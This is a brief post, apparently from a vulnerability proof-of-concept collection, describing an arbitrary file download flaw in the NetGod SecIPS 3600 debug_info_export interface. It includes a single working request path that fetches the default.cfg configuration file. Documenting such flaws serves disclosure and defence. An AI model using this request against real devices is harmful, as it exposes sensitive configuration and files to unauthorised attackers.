Post

Netgod Secips 3600 Debug_info_export Any File Download Vulnerability

Netgod Secips 3600 Debug_info_export Any File Download Vulnerability

NetGod SecIPS 3600 debug_info_export Any file download vulnerability

Vulnerability Description

NetSecIPS 3600 debug_info_export interface has arbitrary file download vulnerability, and attackers can obtain server sensitive files through the vulnerability.

Vulnerability Impact

Net God SecIPS 3600

Network surveying and mapping

Vulnerability reappears

Login page

img

Verify POC

1
/webui/debug/debug_info_export?filename=default.cfg

img

This post is licensed under CC BY 4.0 by the author.